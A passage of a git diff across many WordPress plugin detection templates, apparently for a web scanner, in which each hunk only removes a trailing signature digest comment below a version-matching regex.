4a0a00473045022100b66043df62bb6576d8bb87dc0bc5855da297ae65f89ce92fb7ad5f68cb1c24a1022054d46b984737ba1cf5e22fdd3a320a5a8b2a5b5530432f9aede317849be7ff97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index c26996b4c7..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002c1cf24dec33f8f193a11cec5f5f18c4bd5c7222c5b81ba1d351305ca6a1a7a022100aeb4e43eb289411db0684995c676579b79d8243d057fd2ab5044197ab3cc4eb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b5a1aed509..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c4677a47ad21948f7a03b80a7c9f99d4b4398fbcbfa41dedc745338a103ad215022100ffa61f3c39e41f404659b42b0a1b35b1e4fe11927a1a6fac3481b8dd153885d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 36f9f359e4..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f0f18957bb8eabbf495f66913a6d19de1dd484519675f25b2e611d2b5b8f3e00022100f97743ae774265697c627738a5b088e2f853f946e5aa6365ce9019eebc765bb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 3b51607dea..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220092a8231483aae06790c1420248d5386ead2beec72293e33aab674153343c8fb02207eae756752d20100fd4c25dfda950e7a12c0bb20beff6939e8262a530aacc1d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f317ce87fe..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a5621513883dd829341863c4c1dd79de7061cbe30e43caf1754faed4214b149b02206c88a258bc655f2ed510f70fec75d42c2e2be5930968403cb5a9d1c222bbc6ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 80bccc9a1c..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ebee108abc0370682684e26f5ef44e93bf0dac5e055fed50c4f41a4d0ba7494b022100bc3efa5d7adf5d73571891c17a603c0407a2cd1b7e94a1c3f09d25e0ea0c0aba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 82985feac3..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e31ba6cef21a95c903effa838f58a8b44758bdf74c4327948bf95a27a323e3fe0220700ed292c0743151eb66af86d92ff36ce47352fe871c85929672236645437576:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 2f3de46b98..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202d2c7afb42705f21e61c8aff58cdf21f17fd9b3f4ff8b19b28c30079a135f99b02204caeb13087a12cc1b50f379aa0e0089a1d4eafa9c46156a85963f67f04cfd6b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index b36930e72a..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203f1c567d2f6f5d5bf399dee9d1d32332ff59b37ab4e69c86fc338cf25d0697990220668af29bcdf6eaae77c4509254d56ddf69a95c36c92fc55f88105f1cfdf78684:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index d3920fbb82..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aee45eb3088a28d53b344fb59bf6006227627dfe030c3d9b81f367682cedd810022077431c6fd8bea9aa8e5ef50a377db84d0418e3cd0ece3cb7f9795fe8c88afcf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index fb749ac9b2..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f9dd558f40be08e42028d83577e5b9b9ad30d71c112bef7b9a45f20a63f6af99022031562fe74c96dd77be9c6ee763fe85048bfef763394c386fef99b92e1b2ac385:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 17e7d5f1a8..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e1129b023cb9c7d9051d5e40177f33b09b605c030a23d22da8fe11412299a2ee02206875fac735222b817cc7e75cf14b805f5a0156c9ab627f824013ed1ed767b3bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index c620e0d5c6..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022051864edc89e0c821ffbb2d37ce65f147ce54ae476328b306382524226cb97018022100b4a4a7295ee9f5d07437e50c97f4ed8e6bfea9c3318375a44d1b212c5fe06e90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index c660873526..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c3987fd448473e025f661c51d9c721550c8d903fb4b0c5d7524fe837fca238d9022100d9c129ae9538cbdb5abe7005f48d76f7dd518366f1eb16b17687f9a0424d67f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index a86c3402ab..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210097aab7942769d3f255ce22bac1c934d649c49a7dabbc55bd409fbd439a7b8159022100a41ecaf553f6e6ea581709c0628397e540a4ad4001825bc62ec483de6291f30d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 9a0e94220e..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203a0a41b9d1c68cb3bfe8557b35c02527ff239ac533007f838821bc5774ad0604022100e6c6f70632e54c7d034ff7d623656c3a2df1073c1685f242eac2e5ad73e3a5d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index e541cc604b..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022009efc23e465a4d654e640d002bcaf1fd71257b9976452e7dd9ddc87fe196871d02204a6e6ac975604f16a4c0e4105d91b0d182460d5e64c02d4bf57df39407416730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index d853f91a47..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b451e436020341331a7a9f16b099ec8d543eb0c37f46eb8a0a30d1c11c418353022006f9cbf8e2d8e882a8efbee13a373a0a903c5c55f91e9169c6e4e825216b0ad8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 47ce737abd..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cdc282dbc9380e38d21cefba1782ab87458beb9e643c9d4f69561a86c01444c2022100b4ab48249a80744e413cd31ce5cb7a506f55071e58c85711d9f50d083916b184:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 1a875c0b96..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220269c9035dd796ad880637db3cf65adc51c7d6ed8af6a8d045024626f78d718410221009df9fefc4b902f91483e9f5e21e69549a5ff692e1082cef95a1c930c69972488:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index d8e7f93397..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f1b3f3fb230131675bde854da09a3d7c54d9b3a4ba1fc30a236198f5fdba421f0220294bbd346ca26121daafabe8e400e80ea52a3ab5cb9d09e0f99608483f48164b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 46f2d731f0..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200aa75f7a526cfe2a35a2b23f38e0816f67db2301653a3b4e05060da5ffe31056022100ad4f991133543cbd6e03af334da81a6011625dbdb3b950e2bccbd0fd7dbb7e30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index daf8fa2d05..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b85b96bfe5fb593c31623d25dca93754eb54d943481fe7b4bbd531a674962554022100dde70b28b9be4d00cc165c496a404d4829bf4cc7fe397aca8ea53d5233aa0dea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 6fcf451135..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022077180897560184e2ec3d81a202514e5b91fe7eb5706ee42efe63a265d0f8211c022035654a283f369f7e56713d123e3abd7afa68b1b20c11b27ec06c58ed0dd5e2eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 006f65fb72..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b13c8986278d5bcb035740dc60a0bbab3fe112d69e170a85a786300cc3e03e10022100c7a49b51badf2bd45176e7bc68a14bd5478205b6ff4114d9d409a26e2d8e221a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index a4d5a5a71f..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203d767503db09a4887a36ff179ad6ca33117501fdde4f41904c7387d9140dfaff022100ff0b6f3ea9782ebc2a30edbc4b0af7e035220fa95e9b87234011b2cd3cb02ad9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 2f373e6ef6..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206bcf3c6551ee301ac90ee3c7829b809b582c91b4b87e2b4c36073d6a1e4d9f2d022100d9b25cfd2d4f23cdc6d349239fbf9505b272e159470a2d438f49bbc754e995dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 363952b34f..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ec9f5ed3f3a0c6630e28e30e29789117c1580b83dcc0f44bb1801d7404a167dd022100f314b49bbf2627e6e891b3321c301d1587e9ac76e129abde95855010d51f20a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 74566a9358..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022064c27a35e77cfabb75d9cdbfd98186929ce6445b2125cf7037b178cf51eb70080220397673e3a36ab642fcc3008cb20132805366fa7ecc88c46bec5982416ef51957:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 0d4a75e3f8..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e0a624484fe0fa7cdfce391caff45ddf41d5994148b2f0bad64c2a7872e190a022100f3572dbcf6e00ced5860586e82f0b696b50be84961148b5be8a627cd40fde628:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f3de01f92f..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f157880ae8e320152a415eae53b23e8f7e66b6e8871834d3dd99246990bea79702210087738a3914322b9ff7677f66474cde8a79ec293153d91e8219900e4569063fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 848332437b..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022078b1c74d9c179952c50b358ab44c888806469332aa7e47c6e0cce69f87e542b202200cb3b079a97abe32dda9889eb94f62f430f99fa48141a5660a3e173695b23da5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 9f56cf6d99..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200ac680be6d3608abc546c29710478cf47c73c7fa4a953424e5d79b67cfc66262022100fd455d07782c071f4a605a546350b736be7e8c5fd522aec089d20c9c45079f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index ea98d783da..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100afbdb764f4fb77423e1430884373ca9ac61ff78cdf29ea56d18e4e8a072e674f022100bde3bf72ef535a679618fa77411c0649c7bb6a6e61409804c4441571dfd4085f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 0d4f30ae93..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206f9e310a3e20a8ce8e63e8c2b70465b4eece9e39bd60e5dd3f1fb99cb90a759d0220630988594e81ad4ac6b5111f60409b81f8463947174f31cb93f6c0687a1cbd9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 8a1ecfefda..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220046e928c97a054c611e36a1d63a5da4d137dee1d1a1606a7407e708283e5967c022100e3d048fc32feb15474d86fe1ce45f99fd3cfa6ad2ea398807c80026c6ec11961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index a5398d363f..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022071f41abf23f9e8e54ad25a2c7caeaa6b09e1366930ccc4427124c8d95a52be1a022100d64d7ca145f9338d2a4d04bc2c2b70876852564dea2fd70f16d6190ad1173cce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index e27ceb1fa7..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202d2edbd1555944c17b89af8cc09819e9a5c9da2aad41793a8da820212715c89f022100ed17ed3f06771ec9e3387b9056ce07eea10e4fce1a29479e904a32fdeeafc67f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 0fb97f9fef..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206ccfb26d689e710333ae287a78f9852eae5293a70f168afded705324574f8943022100b43ba2ecebaa110e7ed8169d925b387d38ede2361b843c3475b854c14dda8152:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 4c9a858488..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204a6f98acb769a4e96539ca0db8bc101490fcfba45fdf2ba6c46a6abe9f8d6c48022100fb65c049a2f36f6168f2da2ba2f5e792d9448da88da5f42e4d4852b4a4469bda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index f2de6448d6..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009629a6778faa007b0004e6ba90e04c73f7cbd926b9bb513d9719287415fc48d5022100e94e287a71450d2f28454e086bb37d93a603710374a29e552fa2fee5ad5e7bdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index ad9813b1c8..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f97e8710d676ae9160e28ef08aef7f488b5ed0bcdb4bf62dce42fe96c6439c7a0220777241e5fca732e47147eb3d73a95fb0c20e41b18e29b0f44fff21a7ac5077d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index f4940fb8b8..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205be901f97937b80f842149c97e752689c44425f7d3555dd40bc9185b69f6f47a022050a91237a2d84d4e4e49770a37a7001db0314e9c0d1749c18c7a2a736649453c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 11c76b2bbf..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ca92673db6e46aebaaa39f46b39e15bf748fcfb035d374fd20ffa5b377dcb0b80220008b95539085eec642385a5bfc6c83daef7ebe2008311674198b80b7d0bc3d95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index ca5304e26c..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a5f598b2a89dd0bb01bb5615010bd1d42db1497737dc8177c087661e1fcfe9fc02210092b31de1a6f44394629a8215fdf95d87532e7705e89f75e2140bd4fe2285b56a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c000b70da5..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201ee77a058cf0610db56decc856b905aa45edc2a41c9b1ad69af78127a4cfbc86022100f6289f9486c28423a28802dda001a32332bd2186b6087ffc524a4eef772228a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 54f59f0dff..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 